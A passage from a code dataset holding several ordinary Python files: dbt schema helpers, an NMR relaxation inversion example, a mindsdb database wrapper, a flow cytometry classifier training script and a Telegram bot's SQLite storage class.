connection\")\n raise e\n finally:\n cursor.close()\n\n def truncate(self, schema, relation):\n sql = ('truncate table \"{schema}\".\"{relation}\"'\n .format(schema=schema, relation=relation))\n logger.debug(\"dropping table %s.%s\", schema, relation)\n self.execute_and_handle_permissions(sql, relation)\n logger.debug(\"dropped %s.%s\", schema, relation)\n\n def drop(self, schema, relation_type, relation):\n sql = ('drop {relation_type} if exists \"{schema}\".\"{relation}\" cascade'\n .format(\n schema=schema,\n relation_type=relation_type,\n relation=relation))\n logger.debug(\"dropping %s %s.%s\", relation_type, schema, relation)\n self.execute_and_handle_permissions(sql, relation)\n logger.debug(\"dropped %s %s.%s\", relation_type, schema, relation)\n\n def sql_columns_in_table(self, schema_name, table_name):\n sql = (\"\"\"\n select column_name, data_type, character_maximum_length\n from information_schema.columns\n where table_name = '{table_name}'\"\"\"\n .format(table_name=table_name).strip())\n\n if schema_name is not None:\n sql += (\" AND table_schema = '{schema_name}'\"\n .format(schema_name=schema_name))\n\n return sql\n\n def get_columns_in_table(self, schema_name, table_name, use_cached=True):\n logger.debug(\"getting columns in table %s.%s\", schema_name, table_name)\n\n columns = self.get_table_columns_if_cached(schema_name, table_name)\n if columns is not None and use_cached:\n logger.debug(\"Found columns (in cache): %s\", columns)\n return columns\n\n sql = self.sql_columns_in_table(schema_name, table_name)\n results = self.execute_and_fetch(sql)\n\n columns = []\n for result in results:\n column, data_type, char_size = result\n col = Column(column, data_type, char_size)\n columns.append(col)\n\n self.cache_table_columns(schema_name, table_name, columns)\n\n logger.debug(\"Found columns: %s\", columns)\n return columns\n\n def rename(self, schema, from_name, to_name):\n rename_query = 'alter table \"{schema}\".\"{from_name}\" rename to \"{to_name}\"'.format(schema=schema, from_name=from_name, to_name=to_name) # noqa\n logger.debug(\n \"renaming model %s.%s --> %s.%s\",\n schema, from_name, schema, to_name)\n self.execute_and_handle_permissions(rename_query, from_name)\n logger.debug(\n \"renamed model %s.%s --> %s.%s\",\n schema, from_name, schema, to_name)\n\n def get_missing_columns(self, from_schema, from_table, to_schema,\n to_table):\n \"\"\"Returns dict of {column:type} for columns in from_table that are\n missing from to_table\"\"\"\n from_columns = {col.name: col for col in\n self.get_columns_in_table(from_schema, from_table)}\n to_columns = {col.name: col for col in\n self.get_columns_in_table(to_schema, to_table)}\n\n missing_columns = set(from_columns.keys()) - set(to_columns.keys())\n\n return [col for (col_name, col) in from_columns.items()\n if col_name in missing_columns]\n\n def create_table(self, schema, table, columns, sort, dist):\n fields = ['\"{field}\" {data_type}'.format(\n field=column.name, data_type=column.data_type\n ) for column in columns]\n fields_csv = \",\\n \".join(fields)\n dist = self.target.dist_qualifier(dist)\n sort = self.target.sort_qualifier('compound', sort)\n sql = 'create table if not exists \"{schema}\".\"{table}\" (\\n {fields}\\n) {dist} {sort};'.format(schema=schema, table=table, fields=fields_csv, sort=sort, dist=dist) # noqa\n logger.debug('creating table \"%s\".\"%s\"'.format(schema, table))\n self.execute_and_handle_permissions(sql, table)\n\n def create_schema_if_not_exists(self, schema_name):\n schemas = self.get_schemas()\n\n if schema_name not in schemas:\n self.create_schema(schema_name)\n\n def alter_column_type(self, schema, table, column_name, new_column_type):\n \"\"\"\n 1. Create a new column (w/ temp name and correct type)\n 2. Copy data over to it\n 3. Drop the existing column (cascade!)\n 4. Rename the new column to existing column\n \"\"\"\n\n opts = {\n \"schema\": schema,\n \"table\": table,\n \"old_column\": column_name,\n \"tmp_column\": \"{}__dbt_alter\".format(column_name),\n \"dtype\": new_column_type\n }\n\n sql = \"\"\"\n alter table \"{schema}\".\"{table}\" add column \"{tmp_column}\" {dtype};\n update \"{schema}\".\"{table}\" set \"{tmp_column}\" = \"{old_column}\";\n alter table \"{schema}\".\"{table}\" drop column \"{old_column}\" cascade;\n alter table \"{schema}\".\"{table}\" rename column \"{tmp_column}\" to \"{old_column}\";\n \"\"\".format(**opts) # noqa\n\n status = self.execute(sql)\n return status\n\n def expand_column_types_if_needed(self, temp_table, to_schema, to_table):\n source_columns = {col.name: col for col in\n self.get_columns_in_table(None, temp_table)}\n dest_columns = {col.name: col for col in\n self.get_columns_in_table(to_schema, to_table)}\n\n for column_name, source_column in source_columns.items():\n dest_column = dest_columns.get(column_name)\n\n if dest_column is not None and \\\n dest_column.can_expand_to(source_column):\n new_type = Column.string_type(source_column.string_size())\n logger.debug(\"Changing col type from %s to %s in table %s.%s\",\n dest_column.data_type,\n new_type,\n to_schema,\n to_table)\n self.alter_column_type(\n to_schema, to_table, column_name, new_type)\n\n # update these cols in the cache! This is a hack to fix broken\n # incremental models for type expansion. TODO\n self.cache_table_columns(to_schema, to_table, source_columns)\n\n def table_exists(self, schema, table):\n if schema == self.target.schema:\n exists = self.runtime_existing.get(table) is not None\n return exists\n else:\n tables = self.query_for_existing(schema)\n exists = tables.get(table) is not None\n return exists\n","sub_path":"dbt/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":14070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"403360928","text":"\"\"\"\n0.10 Cs2O • 0.90 SiO2 MAS-ETA\n=============================\n\"\"\"\n\n# %%\n# The following example is an application of the statistical learning method in\n# determining the distribution of the Si-29 echo train decay constants in glasses.\n#\n# Import all relevant packages.\nimport csdmpy as cp\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom mrinversion.kernel import relaxation\nfrom mrinversion.linear_model import LassoFistaCV, TSVDCompression\nfrom csdmpy import statistics as stats\n\nplt.rcParams[\"pdf.fonttype\"] = 42 # For using plots in Illustrator\nplt.rc(\"font\", size=9)\n\n\ndef plot2D(csdm_object, **kwargs):\n plt.figure(figsize=(4, 3))\n csdm_object.plot(cmap=\"gist_ncar_r\", **kwargs)\n plt.tight_layout()\n plt.show()\n\n\n# sphinx_gallery_thumbnail_number = 4\n\n# %%\n# Dataset setup\n# -------------\n# Import the dataset\n# ''''''''''''''''''\n# Load the dataset as a CSDM data-object.\n\n# The 2D SE-PIETA MAS dataset in csdm format\ndomain = \"https://www.ssnmr.org/sites/default/files/mrsimulator\"\nfilename = f\"{domain}/MAS_SE_PIETA_10Cs_90Si_FT.csdf\"\ndata_object = cp.load(filename)\n\n# Inversion only requires the real part of the complex dataset.\ndata_object = data_object.real\nsigma = 1270.825 # data standard deviation\n\n# Convert the MAS dimension from Hz to ppm.\ndata_object.dimensions[0].to(\"ppm\", \"nmr_frequency_ratio\")\nplot2D(data_object)\n\n# %%\n# Prepping the data for inversion\n# '''''''''''''''''''''''''''''''\ndata_object = data_object.T\ndata_object_truncated = data_object[:, 1220:-1220]\nplot2D(data_object_truncated)\n\n# %%\n# Linear Inversion setup\n# ----------------------\n# Dimension setup\n# '''''''''''''''\ndata_object_truncated.dimensions[0].to(\"s\") # set coordinates to 's'\nkernel_dimension = data_object_truncated.dimensions[0]\n\n# %%\n# Generating the kernel\n# '''''''''''''''''''''\nrelaxT2 = relaxation.T2(\n kernel_dimension=kernel_dimension,\n inverse_dimension=dict(\n count=32,\n minimum=\"1e-3 s\",\n maximum=\"1e4 s\",\n scale=\"log\",\n label=r\"log ($\\lambda^{-1}$ / s)\",\n ),\n)\ninverse_dimension = relaxT2.inverse_dimension\nK = relaxT2.kernel(supersampling=20)\n\n# %%\n# Data Compression\n# ''''''''''''''''\nnew_system = TSVDCompression(K, data_object_truncated)\ncompressed_K = new_system.compressed_K\ncompressed_s = new_system.compressed_s\n\nprint(f\"truncation_index = {new_system.truncation_index}\")\n\n# %%\n# Solving the inverse problem\n# ---------------------------\n# FISTA LASSO cross-validation\n# '''''''''''''''''''''''''''''\n\n# setup the pre-defined range of alpha and lambda values\nlambdas = 10 ** (-4 + 5 * (np.arange(32) / 31))\n\n# setup the smooth lasso cross-validation class\ns_lasso = LassoFistaCV(\n lambdas=lambdas, # A numpy array of lambda values.\n sigma=sigma, # data standard deviation\n folds=5, # The number of folds in n-folds cross-validation.\n inverse_dimension=inverse_dimension, # previously defined inverse dimensions.\n)\n\n# run the fit method on the compressed kernel and compressed data.\ns_lasso.fit(K=compressed_K, s=compressed_s)\n\n# %%\n# The optimum hyper-parameters\n# ''''''''''''''''''''''''''''\nprint(s_lasso.hyperparameters)\n\n# %%\n# The cross-validation curve\n# ''''''''''''''''''''''''''\nplt.figure(figsize=(4, 3))\ns_lasso.cv_plot()\nplt.tight_layout()\nplt.show()\n\n# %%\n# The optimum solution\n# ''''''''''''''''''''\nf_sol = s_lasso.f\n\nlevels = np.arange(15) / 15 + 0.1\nplt.figure(figsize=(3.85, 2.75)) # set the figure size\nax = plt.subplot(projection=\"csdm\")\ncb = ax.contourf(f_sol / f_sol.max(), levels=levels, cmap=\"jet_r\")\nax.set_ylim(-70, -130)\nax.set_xlim(-3, 2.5)\nplt.title(\"10Cs:90Si\")\nax.set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax.set_ylabel(\"Frequency / ppm\")\nplt.grid(linestyle=\"--\", alpha=0.75)\nplt.colorbar(cb, ticks=np.arange(11) / 10)\nplt.tight_layout()\nplt.show()\n\n\n# %%\n# The fit residuals\n# '''''''''''''''''\nresiduals = s_lasso.residuals(K=K, s=data_object_truncated)\nplot2D(residuals)\n\n# %%\n# The standard deviation of the residuals is\nresiduals.std()\n\n# %%\n# Saving the solution\n# '''''''''''''''''''\nf_sol.save(\"10Cs-90Si_inverse.csdf\") # save the solution\nresiduals.save(\"10Cs-90Si_residue.csdf\") # save the residuals\n\n# %%\n# Analysis\n# --------\n\n# Normalize the distribution to 1.\nf_sol /= f_sol.max()\n\n# Get the Q4 and Q3 cross-sections.\nQ4_coordinate = -108.9e-6 # ppm\nQ3_coordinate = -98.6e-6 # ppm\nQ4_index = np.where(f_sol.dimensions[1].coordinates >= Q4_coordinate)[0][0]\nQ3_index = np.where(f_sol.dimensions[1].coordinates >= Q3_coordinate)[0][0]\n\nQ4_region = f_sol[:, Q4_index]\nQ3_region = f_sol[:, Q3_index]\n\n# %%\n# Plot of the Q4 and Q3 cross-sections\nfig, ax = plt.subplots(1, 2, figsize=(7, 2.75), subplot_kw={\"projection\": \"csdm\"})\ncb = ax[0].contourf(f_sol, levels=levels, cmap=\"jet_r\")\nax[0].arrow(1, Q4_coordinate * 1e6, -0.5, 0, color=\"blue\")\nax[0].arrow(1, Q3_coordinate * 1e6, -0.5, 0, color=\"orange\")\nax[0].set_ylim(-70, -130)\nax[0].set_xlim(-3, 2.5)\nax[0].set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax[0].set_ylabel(\"Frequency / ppm\")\nax[0].grid(linestyle=\"--\", alpha=0.75)\n\nax[1].plot(Q4_region, label=\"Q4\")\nax[1].plot(Q3_region, label=\"Q3\")\nax[1].set_xlim(-3, 2.5)\nax[1].set_xlabel(r\"$\\log(\\lambda^{-1}\\,/\\,$s)\")\nax[1].grid(linestyle=\"--\", alpha=0.75)\n\nplt.colorbar(cb, ax=ax[0], ticks=np.arange(11) / 10)\nplt.tight_layout()\nplt.legend()\nplt.savefig(\"10Cs-90Si.pdf\")\nplt.show()\n\n# %%\n# Mean and mode analysis\n# ''''''''''''''''''''''\n# The T2 distribution is sampled over a log-linear scale. The statistical mean of\n# the `Q4_region` and `Q3_region` in log10(T2). The mean T2 is 10**(log10(T2)),\n# in units of seconds.\n\nQ4_mean = 10 ** stats.mean(Q4_region)[0] * 1e3 # ms\nQ3_mean = 10 ** stats.mean(Q3_region)[0] * 1e3 # ms\n\n# %%\n# Mode the argument corresponding to the max distribution.\n\n# index corresponding to the max distribution.\narg_index_Q4 = int(np.argmax(Q4_region))\narg_index_Q3 = int(np.argmax(Q3_region))\n\n# log10(T2) coordinates corresponding to the max distribution.\narg_coord_Q4 = Q4_region.dimensions[0].coordinates[arg_index_Q4]\narg_coord_Q3 = Q3_region.dimensions[0].coordinates[arg_index_Q3]\n\n# T2 coordinates corresponding to the max distribution.\nQ4_mode = 10**arg_coord_Q4 * 1e3 # ms\nQ3_mode = 10**arg_coord_Q3 * 1e3 # ms\n\n# %%\n# Results\n# '''''''\nprint(f\"Q4 statistics:\\n\\tmean = {Q4_mean} ms,\\n\\tmode = {Q4_mode} ms\\n\")\nprint(f\"Q3 statistics:\\n\\tmean = {Q3_mean} ms,\\n\\tmode = {Q3_mode} ms\\n\")\nprint(f\"r_λ (mean) = {Q4_mean/Q3_mean}\")\nprint(f\"r_λ (mode) = {Q4_mode/Q3_mode}\")\n","sub_path":"examples/relaxation/plot-10Cs-90Si.py","file_name":"plot-10Cs-90Si.py","file_ext":"py","file_size_in_byte":6478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"18075398","text":"from mindsdb.integrations.clickhouse.clickhouse import Clickhouse\nfrom mindsdb.integrations.postgres.postgres import PostgreSQL\nfrom mindsdb.integrations.mariadb.mariadb import Mariadb\nfrom mindsdb.integrations.mysql.mysql import MySQL\nfrom mindsdb.integrations.mssql.mssql import MSSQL\nfrom mindsdb.integrations.mongodb.mongodb import MongoDB\nfrom mindsdb.integrations.redis.redisdb import Redis\nfrom mindsdb.integrations.kafka.kafkadb import Kafka\nfrom mindsdb.utilities.log import log as logger\nfrom mindsdb.utilities.config import Config\nfrom mindsdb.interfaces.database.integrations import DatasourceController\nfrom mindsdb.utilities.with_kwargs_wrapper import WithKWArgsWrapper\n\n\nclass DatabaseWrapper():\n known_dbs = {'clickhouse': Clickhouse,\n 'mariadb': Mariadb,\n 'mysql': MySQL,\n 'postgres': PostgreSQL,\n 'mssql': MSSQL,\n 'mongodb': MongoDB,\n 'redis': Redis,\n 'kafka': Kafka}\n\n def __init__(self, company_id):\n self.config = Config()\n self.company_id = company_id\n self.datasource_interface = WithKWArgsWrapper(\n DatasourceController(), company_id=company_id\n )\n\n def setup_integration(self, db_alias):\n try:\n # If this is the name of an integration\n integration = self._get_integration(db_alias)\n if integration is False:\n raise Exception(f'Unkonw database integration type for: {db_alias}')\n if integration is not True:\n integration.setup()\n except Exception as e:\n logger.warning('Failed to integrate with database ' + db_alias + f', error: {e}')\n\n def _get_integration(self, db_alias):\n integration = self.datasource_interface.get_db_integration(db_alias)\n if integration:\n db_type = integration['type']\n if db_type in self.known_dbs:\n return self.known_dbs[db_type](self.config, db_alias, integration)\n logger.warning(f'Uknown integration type: {db_type} for database called: {db_alias}')\n return False\n return True\n\n def _get_integrations(self, publish=False):\n all_integrations = self.datasource_interface.get_db_integrations()\n if publish is True:\n all_integrations = [\n x for x, y in self.datasource_interface.get_db_integrations().items()\n if y.get('publish') is True\n ]\n else:\n all_integrations = [x for x in self.datasource_interface.get_db_integrations()]\n integrations = [self._get_integration(x) for x in all_integrations]\n integrations = [x for x in integrations if x is not True and x is not False]\n return integrations\n\n def register_predictors(self, model_data_arr, integration_name=None):\n if integration_name is None:\n integrations = self._get_integrations(publish=True)\n else:\n integration = self._get_integration(integration_name)\n integrations = [] if isinstance(integration, bool) else [integration]\n\n for integration in integrations:\n if integration.check_connection():\n try:\n integration.register_predictors(model_data_arr)\n except Exception as e:\n logger.warning(f\"Error {e} when trying to register predictor to {integration.name}. Predictor wouldn't be registred.\")\n else:\n logger.warning(f\"There is no connection to {integration.name}. Predictor wouldn't be registred.\")\n\n def unregister_predictor(self, name):\n for integration in self._get_integrations(publish=True):\n # FIXME\n # !!! Integrations from config.json add to db on each start!!!!\n if '@@@@@' in name:\n sn = name.split('@@@@@')\n assert len(sn) < 3 # security\n name = sn[1]\n if integration.check_connection():\n integration.unregister_predictor(name)\n else:\n logger.warning(f\"There is no connection to {integration.name}. predictor wouldn't be unregistred\")\n\n def check_connections(self):\n connections = {}\n for integration in self._get_integrations():\n connections[integration.name] = integration.check_connection()\n\n return connections\n","sub_path":"mindsdb/interfaces/database/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"636229557","text":"#!/usr/bin/env python3\n\"\"\"\nTrain de-novo classifier for berlin som data.\n\"\"\"\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.preprocessing import LabelBinarizer\nfrom tensorflow import keras\nfrom tensorflow.keras import layers, regularizers, models # pylint: disable=import-error\n# from keras import layers, regularizers, models\nfrom argmagic import argmagic\n\nfrom flowcat import utils, io_functions, mappings\nfrom flowcat.som_dataset import SOMDataset, SOMSequence\n\n\ndef create_model_early_merge(input_shapes, yshape, global_decay=5e-6):\n inputs = []\n for xshape in input_shapes:\n ix = layers.Input(shape=xshape)\n inputs.append(ix)\n\n x = layers.concatenate(inputs)\n x = layers.Conv2D(\n filters=64, kernel_size=4, activation=\"relu\", strides=3,\n kernel_regularizer=regularizers.l2(global_decay))(x)\n x = layers.Conv2D(\n filters=96, kernel_size=3, activation=\"relu\", strides=2,\n kernel_regularizer=regularizers.l2(global_decay))(x)\n x = layers.Conv2D(\n filters=128, kernel_size=1, activation=\"relu\", strides=1,\n kernel_regularizer=regularizers.l2(global_decay))(x)\n x = layers.GlobalAveragePooling2D()(x)\n # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n # x = layers.Dropout(0.2)(x)\n\n # x = layers.Dense(\n # units=128, activation=\"relu\", kernel_initializer=\"uniform\",\n # kernel_regularizer=regularizers.l2(global_decay)\n # )(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.Dropout(0.2)(x)\n x = layers.Dense(\n units=128, activation=\"relu\",\n # kernel_initializer=\"uniform\",\n kernel_regularizer=regularizers.l2(global_decay)\n )(x)\n # x = layers.BatchNormalization()(x)\n x = layers.Dense(\n units=64, activation=\"relu\",\n # kernel_initializer=\"uniform\",\n kernel_regularizer=regularizers.l2(global_decay)\n )(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.Dropout(0.2)(x)\n\n x = layers.Dense(\n units=yshape, activation=\"softmax\"\n )(x)\n\n model = models.Model(inputs=inputs, outputs=x)\n for layer in model.layers:\n print(layer.output_shape)\n return model\n\n\ndef create_model_multi_input(input_shapes, yshape, global_decay=5e-6):\n segments = []\n inputs = []\n print(input_shapes)\n for xshape in input_shapes:\n ix = layers.Input(shape=xshape)\n inputs.append(ix)\n x = layers.Conv2D(\n filters=32, kernel_size=4, activation=\"relu\", strides=1,\n kernel_regularizer=regularizers.l2(global_decay),\n )(ix)\n x = layers.Conv2D(\n filters=48, kernel_size=3, activation=\"relu\", strides=1,\n kernel_regularizer=regularizers.l2(global_decay),\n )(x)\n # x = layers.Conv2D(\n # filters=32, kernel_size=2, activation=\"relu\", strides=1,\n # kernel_regularizer=regularizers.l2(global_decay),\n # )(x)\n # x = layers.Conv2D(\n # filters=64, kernel_size=2, activation=\"relu\", strides=1,\n # # kernel_regularizer=regularizers.l2(global_decay),\n # )(x)\n # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n x = layers.Conv2D(\n filters=48, kernel_size=2, activation=\"relu\", strides=1,\n kernel_regularizer=regularizers.l2(global_decay),\n )(x)\n x = layers.Conv2D(\n filters=64, kernel_size=2, activation=\"relu\", strides=1,\n kernel_regularizer=regularizers.l2(global_decay),\n )(x)\n # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n\n # x = layers.GlobalAveragePooling2D()(x)\n x = layers.GlobalMaxPooling2D()(x)\n segments.append(x)\n\n x = layers.concatenate(segments)\n # x = layers.Conv2D(\n # filters=32, kernel_size=2, activation=\"relu\", strides=1,\n # kernel_regularizer=regularizers.l2(global_decay))(x)\n # x = layers.MaxPooling2D(pool_size=2, strides=2)(x)\n # x = layers.Dropout(0.2)(x)\n\n # x = layers.Flatten()(ix)\n\n # x = layers.Dense(\n # units=128, activation=\"relu\", kernel_initializer=\"uniform\",\n # kernel_regularizer=regularizers.l2(global_decay)\n # )(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.Dropout(0.2)(x)\n x = layers.Dense(\n units=128, activation=\"relu\",\n # kernel_initializer=\"uniform\",\n kernel_regularizer=regularizers.l2(global_decay)\n )(x)\n # x = layers.BatchNormalization()(x)\n x = layers.Dense(\n units=64, activation=\"relu\",\n # kernel_initializer=\"uniform\",\n kernel_regularizer=regularizers.l2(global_decay)\n )(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.BatchNormalization()(x)\n # x = layers.Dropout(0.2)(x)\n\n x = layers.Dense(\n units=yshape, activation=\"softmax\"\n )(x)\n\n model = models.Model(inputs=inputs, outputs=x)\n for layer in model.layers:\n print(layer.output_shape)\n return model\n\n\ndef get_model(channel_config, groups, **kwargs):\n inputs = tuple([*d[\"dims\"][:-1], len(d[\"channels\"])] for d in channel_config.values())\n output = len(groups)\n\n # model = create_model_multi_input(inputs, output, **kwargs)\n model = create_model_multi_input(inputs, output, **kwargs)\n model.compile(\n loss=\"categorical_crossentropy\",\n # loss=\"binary_crossentropy\",\n optimizer=\"adam\",\n # optimizer=optimizers.Adam(lr=0.0, decay=0.0, epsilon=epsilon),\n metrics=[\n \"acc\",\n ]\n )\n\n binarizer = LabelBinarizer()\n binarizer.fit(groups)\n return binarizer, model\n\n\ndef main(data: utils.URLPath, meta: utils.URLPath, output: utils.URLPath):\n \"\"\"\n Args:\n data: Path to som dataset\n output: Output path\n \"\"\"\n tubes = (\"2\", \"3\", \"4\")\n pad_width = 1\n\n group_mapping = mappings.GROUP_MAPS[\"8class\"]\n mapping = group_mapping[\"map\"]\n groups = group_mapping[\"groups\"]\n\n # dataset = io_functions.load_case_collection(data, meta)\n dataset = SOMDataset.from_path(data)\n if mapping:\n dataset = dataset.map_groups(mapping)\n\n dataset = dataset.filter(groups=[g for g in groups if g not in (\"LPL\", \"MZL\")])\n\n dataset_groups = {d.group for d in dataset}\n\n # if set(groups) != dataset_groups:\n # raise RuntimeError(f\"Group mismatch: {groups}, but got {dataset_groups}\")\n\n validate, train = dataset.create_split(10, stratify=True)\n\n group_count = train.group_count\n num_cases = sum(group_count.values())\n balanced_nums = num_cases / len(dataset_groups)\n balanced_loss_weights = [balanced_nums / group_count.get(g, balanced_nums) for g in groups]\n min_ratio = min(balanced_loss_weights)\n balanced_loss_weights = {i: v / min_ratio for i, v in enumerate(balanced_loss_weights)}\n print(balanced_loss_weights)\n\n # train = train.balance(2000)\n # train = train.balance_per_group({\n # \"CM\": 6000,\n # # \"CLL\": 4000,\n # # \"MBL\": 2000,\n # \"MCL\": 1000,\n # \"PL\": 1000,\n # \"LPL\": 1000,\n # \"MZL\": 1000,\n # \"FL\": 1000,\n # \"HCL\": 1000,\n # \"normal\": 6000,\n # })\n\n io_functions.save_json(train.labels, output / \"ids_train.json\")\n io_functions.save_json(validate.labels, output / \"ids_validate.json\")\n\n som_config = io_functions.load_json(data + \"_config.json\")\n selected_tubes = {tube: som_config[tube] for tube in tubes}\n\n config = {\n \"tubes\": selected_tubes,\n \"groups\": groups,\n \"pad_width\": pad_width,\n \"mapping\": group_mapping,\n }\n io_functions.save_json(config, output / \"config.json\")\n\n for tube in tubes:\n x, y, z = selected_tubes[tube][\"dims\"]\n selected_tubes[tube][\"dims\"] = (x + 2 * pad_width, y + 2 * pad_width, z)\n\n binarizer, model = get_model(selected_tubes, groups=groups, global_decay=5e-7)\n\n def getter_fun(sample, tube):\n return sample.get_tube(tube)\n\n trainseq = SOMSequence(\n train, binarizer,\n tube=tubes,\n get_array_fun=getter_fun,\n batch_size=32,\n pad_width=pad_width)\n validseq = SOMSequence(\n validate, binarizer,\n tube=tubes,\n get_array_fun=getter_fun,\n batch_size=128,\n pad_width=pad_width)\n\n tensorboard_dir = str(output / \"tensorboard\")\n tensorboard_callback = keras.callbacks.TensorBoard(\n log_dir=str(tensorboard_dir),\n histogram_freq=5,\n write_grads=True,\n write_images=True,\n )\n nan_callback = keras.callbacks.TerminateOnNaN()\n\n model.fit_generator(\n epochs=15, shuffle=True,\n callbacks=[tensorboard_callback, nan_callback],\n class_weight=balanced_loss_weights,\n generator=trainseq, validation_data=validseq)\n\n model.save(str(output / \"model.h5\"))\n io_functions.save_joblib(binarizer, output / \"binarizer.joblib\")\n\n preds = []\n for pred in model.predict_generator(validseq):\n preds.append(pred)\n pred_arr = np.array(preds)\n pred_labels = binarizer.inverse_transform(pred_arr)\n true_labels = validseq.true_labels\n\n confusion = metrics.confusion_matrix(true_labels, pred_labels, labels=groups)\n print(groups)\n print(confusion)\n balanced = metrics.balanced_accuracy_score(true_labels, pred_labels)\n print(balanced)\n\n # preds = []\n # for pred in model.predict_generator(validseq):\n # preds.append(pred)\n\n # args.output.local.mkdir(parents=True, exist_ok=True)\n\n\nif __name__ == \"__main__\":\n argmagic(main)\n","sub_path":"scripts/53_denovo.py","file_name":"53_denovo.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"134006239","text":"import sqlite3\nimport os\nfrom telethon.tl import types\nfrom . import states\n\n\nclass Database:\n def __init__(self, dbpath):\n conn = sqlite3.connect(dbpath)\n cursor = conn.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS channels (\n channel_id INTEGER PRIMARY KEY NOT NULL,\n username TEXT,\n title TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS messages (\n rowid INTEGER PRIMARY KEY AUTOINCREMENT,\n message_id INTEGER NOT NULL,\n channel_id INTEGER NOT NULL,\n content TEXT NOT NULL\n );\n \"\"\")\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS users (\n user_id INTEGER PRIMARY KEY,\n username TEXT,\n state INTEGER NOT NULL,\n selected_id INTEGER,\n lang TEXT DEFAULT follow NOT NULL\n );\n \"\"\")\n # A junction table to handle many-to-many relationship between channels and admins\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS channels_admins (\n channel_id INTEGER NOT NULL,\n user_id INTEGER NOT NULL\n );\n \"\"\")\n try:\n cursor.execute('SELECT lang FROM users')\n except sqlite3.OperationalError:\n cursor.execute('ALTER TABLE users ADD lang TEXT DEFAULT follow NOT NULL')\n self.conn = conn\n self.cursor = cursor\n\n def save_user(self, user: types.User):\n self.cursor.execute(\n 'INSERT OR IGNORE INTO users (user_id, username, state) VALUES (?, ?, ?)',\n (user.id, user.username, states.Empty))\n self.clear_user_state(user)\n\n def get_user_state(self, user: types.User):\n self.cursor.execute('SELECT state FROM users WHERE user_id = ?',\n (user.id, ))\n fetched = self.cursor.fetchone()\n return None if fetched is None else states.State(fetched[0])\n\n def set_user_state(self, user: types.User, state: states.State):\n self.cursor.execute('UPDATE users SET state = ? WHERE user_id = ?',\n (state.numerator, user.id))\n self.conn.commit()\n\n def clear_user_state(self, user: types.User):\n self.set_user_state(user, state=states.Empty)\n\n def check_channel_saved(self, channel: types.Channel):\n self.cursor.execute('SELECT * FROM channels WHERE channel_id = ?',\n (channel.id, ))\n return self.cursor.fetchone() is not None\n\n def save_channel(self, channel: types.Channel):\n self.cursor.execute(\n 'INSERT INTO channels (channel_id, username, title) VALUES (?, ?, ?)',\n (channel.id, channel.username, channel.title))\n\n def save_channel_admin_relation(self, channel_id: int, admin: types.User):\n if admin.bot:\n return\n self.cursor.execute(\n 'INSERT INTO channels_admins (channel_id, user_id) VALUES (?, ?)',\n (channel_id, admin.id))\n\n def get_user_owned_channels(self, user: types.User):\n self.cursor.execute(\n 'SELECT channel_id FROM channels_admins WHERE user_id = ?',\n (user.id, ))\n sqlresult = self.cursor.fetchall()\n return [x[0] for x in sqlresult]\n\n def get_channel_admins(self, channel_id: types.Channel):\n self.cursor.execute(\n 'SELECT user_id FROM channels_admins WHERE channel_id = ?',\n (channel_id, ))\n sqlresult = self.cursor.fetchall()\n # Return ids only\n return map(lambda x: x[0], sqlresult)\n\n def get_channel_title(self, channel_id: int):\n self.cursor.execute('SELECT title FROM channels WHERE channel_id = ?',\n (channel_id, ))\n return self.cursor.fetchone()[0]\n\n def save_message(self, message: types.Message):\n if not isinstance(message, types.Message):\n return\n if (message.message is None) or (len(message.message) == 0):\n return\n self.cursor.execute(\n 'INSERT INTO messages (message_id, channel_id, content) VALUES (?, ?, ?)',\n (message.id, message.to_id.channel_id, message.message))\n\n def update_message(self, message: types.Message):\n self.cursor.execute(\n 'SELECT rowid FROM messages WHERE message_id=? AND channel_id=?',\n (message.id, message.to_id.channel_id))\n sqlresult = self.cursor.fetchone()\n if sqlresult is None:\n self.cursor.execute(\n 'INSERT INTO messages (message_id, channel_id, content) VALUES (?, ?, ?)',\n (message.id, message.to_id.channel_id, message.message))\n else:\n self.cursor.execute('UPDATE messages SET content=? WHERE rowid=?',\n (message.message, sqlresult[0]))\n\n def find_in_messages(self, channel_id: int, pattern: str):\n self.cursor.execute(\n 'SELECT message_id, content FROM messages WHERE channel_id = ?',\n (channel_id, ))\n messages = self.cursor.fetchall()\n lower_pattern = pattern.lower()\n\n def filter_matched(m):\n if m[1] is None:\n return False\n return m[1].lower().find(lower_pattern) != -1\n\n matched_messages = filter(filter_matched, messages)\n message_ids = [m[0] for m in matched_messages]\n return message_ids\n\n def set_user_selected(self, user_id: int, channel_id: int):\n self.cursor.execute('UPDATE users SET selected_id=? WHERE user_id=?',\n (channel_id, user_id))\n self.conn.commit()\n\n def get_user_selected(self, user_id: int):\n self.cursor.execute('SELECT selected_id FROM users WHERE user_id=?',\n (user_id, ))\n return self.cursor.fetchone()[0]\n\n def set_user_lang(self, user_id: int, langcode: str):\n self.cursor.execute('UPDATE users SET lang=? WHERE user_id=?',\n (langcode, user_id))\n\n def get_user_lang(self, user_id: int):\n self.cursor.execute('SELECT lang FROM users WHERE user_id=?',\n (user_id, ))\n return 